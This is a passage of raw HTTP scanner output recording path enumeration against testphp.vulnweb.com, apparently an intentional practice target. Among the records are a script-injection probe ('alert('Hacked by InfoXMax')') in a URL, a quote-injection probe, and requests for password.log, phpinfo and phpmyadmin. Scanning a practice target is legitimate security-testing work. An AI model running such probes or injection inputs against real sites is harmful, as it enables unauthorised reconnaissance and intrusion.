page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/login.php\",\"time\":\"352.92644ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:38.482617666Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/robots.txt\",\"input\":\"http://testphp.vulnweb.com:80/login.php/robots.txt\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/robots.txt\",\"time\":\"356.233912ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:38.484409362Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/cart.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/cart.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/cart.php\",\"time\":\"352.980947ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:38.489026632Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/userinfo.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/userinfo.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/userinfo.php\",\"time\":\"348.621444ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:38.488872867Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/comment.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/comment.php?\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/comment.php\",\"time\":\"355.805006ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:38.496336089Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/privacy.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/privacy.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/privacy.php\",\"time\":\"347.955361ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:38.497273063Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/index.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/index.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/index.php\",\"time\":\"352.711008ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:38.497487871Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/artists.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/artists.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/artists.php\",\"time\":\"358.582385ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:38.497369305Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/disclaimer.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/disclaimer.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/disclaimer.php\",\"time\":\"347.712673ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:38.500697524Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/guestbook.php\",\"input\":\"http://testphp.vulnweb.com:80/login.php/guestbook.php\",\"title\":\"login page\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/guestbook.php\",\"time\":\"347.195153ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":557,\"lines\":120,\"status_code\":200,\"content_length\":5523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:40.551217292Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/users\",\"input\":\"http://testphp.vulnweb.com:80/login.php/users\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/users\",\"time\":\"339.111221ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:40.555958769Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login/index.php\",\"input\":\"http://testphp.vulnweb.com:80/login/index.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login/index.php\",\"time\":\"345.803431ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:40.562961029Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login/artists.php\",\"input\":\"http://testphp.vulnweb.com:80/login/artists.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login/artists.php\",\"time\":\"344.034187ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:40.56567738Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login/cart.php\",\"input\":\"http://testphp.vulnweb.com:80/login/cart.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login/cart.php\",\"time\":\"351.074668ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:40.566043997Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login/disclaimer.php\",\"input\":\"http://testphp.vulnweb.com:80/login/disclaimer.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login/disclaimer.php\",\"time\":\"348.020851ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:40.567132223Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login/guestbook.php\",\"input\":\"http://testphp.vulnweb.com:80/login/guestbook.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login/guestbook.php\",\"time\":\"352.465481ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:40.569570063Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login/categories.php\",\"input\":\"http://testphp.vulnweb.com:80/login/categories.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login/categories.php\",\"time\":\"344.991995ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:40.56980846Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login/signup.php\",\"input\":\"http://testphp.vulnweb.com:80/login/signup.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login/signup.php\",\"time\":\"339.875843ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:40.576871671Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login/login.php\",\"input\":\"http://testphp.vulnweb.com:80/login/login.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login/login.php\",\"time\":\"355.835223ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:40.577091531Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php=alert('Hacked by InfoXMax');\",\"input\":\"http://testphp.vulnweb.com:80/login.php=alert('Hacked%20by%20InfoXMax');\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php=alert%28%27Hacked%20by%20InfoXMax%27%29;\",\"time\":\"355.476182ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:40.578893644Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php=1\",\"input\":\"http://testphp.vulnweb.com:80/login.php=1\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php=1\",\"time\":\"356.201911ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:40.579446603Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login/AJAX/index.php\",\"input\":\"http://testphp.vulnweb.com:80/login/AJAX/index.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login/AJAX/index.php\",\"time\":\"347.985158ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:40.5818957Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login.php/users/administrator\",\"input\":\"http://testphp.vulnweb.com:80/login.php/users/administrator\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login.php/users/administrator\",\"time\":\"348.288798ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:40.582196935Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login/privacy.php\",\"input\":\"http://testphp.vulnweb.com:80/login/privacy.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login/privacy.php\",\"time\":\"363.882282ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:41.825010692Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/medias/js/common_functions.js\",\"input\":\"http://testphp.vulnweb.com:80/medias/js/common_functions.js\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/medias/js/common_functions.js\",\"time\":\"340.629345ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:41.828432514Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/phpinfo\",\"input\":\"http://testphp.vulnweb.com:80/phpinfo\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/phpinfo\",\"time\":\"349.022155ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:41.828718455Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/medias/css/main.css\",\"input\":\"http://testphp.vulnweb.com:80/medias/css/main.css\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/medias/css/main.css\",\"time\":\"349.633793ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:41.831142068Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/login/userinfo.php\",\"input\":\"http://testphp.vulnweb.com:80/login/userinfo.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login/userinfo.php\",\"time\":\"349.656426ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:41.831344193Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/phpinfo.php\",\"input\":\"http://testphp.vulnweb.com:80/phpinfo.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/phpinfo.php\",\"time\":\"348.60323ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:41.836434167Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/pictures/5.jpg.tn\",\"input\":\"http://testphp.vulnweb.com:80/pictures/5.jpg.tn\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/5.jpg.tn\",\"time\":\"340.231384ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":14,\"lines\":28,\"status_code\":200,\"content_length\":4428,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:41.841034331Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/pictures\",\"input\":\"http://testphp.vulnweb.com:80/pictures\",\"location\":\"http://testphp.vulnweb.com/pictures/\",\"title\":\"301 Moved Permanently\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures\",\"time\":\"355.898726ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":301,\"content_length\":169,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:41.841764661Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/logn\",\"input\":\"http://testphp.vulnweb.com:80/logn\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/logn\",\"time\":\"350.579289ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:41.843066848Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/password.log\",\"input\":\"http://testphp.vulnweb.com:80/password.log\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/password.log\",\"time\":\"340.396754ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:41.8458584Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/newsartists.php\",\"input\":\"http://testphp.vulnweb.com:80/newsartists.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/newsartists.php\",\"time\":\"349.668254ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:41.846023091Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/newsdetail.php\",\"input\":\"http://testphp.vulnweb.com:80/newsdetail.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/newsdetail.php\",\"time\":\"352.658729ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:41.846325499Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/maddy.txt\",\"input\":\"http://testphp.vulnweb.com:80/maddy.txt\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/maddy.txt\",\"time\":\"357.340194ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:41.847378009Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/logout.php'\",\"input\":\"http://testphp.vulnweb.com:80/logout.php'\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/logout.php'\",\"time\":\"356.402141ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:41.847701634Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/phpmyadmin\",\"input\":\"http://testphp.vulnweb.com:80/phpmyadmin\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/phpmyadmin\",\"time\":\"351.85382ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:41.85109024Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/pictures/4.jpg.tn\",\"input\":\"http://testphp.vulnweb.com:80/pictures/4.jpg.tn\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/4.jpg.tn\",\"time\":\"348.613354ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":21,\"lines\":25,\"status_code\":200,\"content_length\":4615,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:41.851141887Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/pictures/1.jpg.tn\",\"input\":\"http://testphp.vulnweb.com:80/pictures/1.jpg.tn\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/1.jpg.tn\",\"time\":\"354.539042ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":20,\"lines\":27,\"status_code\":200,\"content_length\":4355,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:41.853666932Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/php\",\"input\":\"http://testphp.vulnweb.com:80/php?\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/php\",\"time\":\"348.393815ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:41.853682314Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/pictures/2.jpg.tn\",\"input\":\"http://testphp.vulnweb.com:80/pictures/2.jpg.tn\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/2.jpg.tn\",\"time\":\"352.330507ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":12,\"status_code\":200,\"content_length\":1353,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:41.854062179Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/pictures/3.jpg.tn\",\"input\":\"http://testphp.vulnweb.com:80/pictures/3.jpg.tn\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/pictures/3.jpg.tn\",\"time\":\"349.954615ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":20,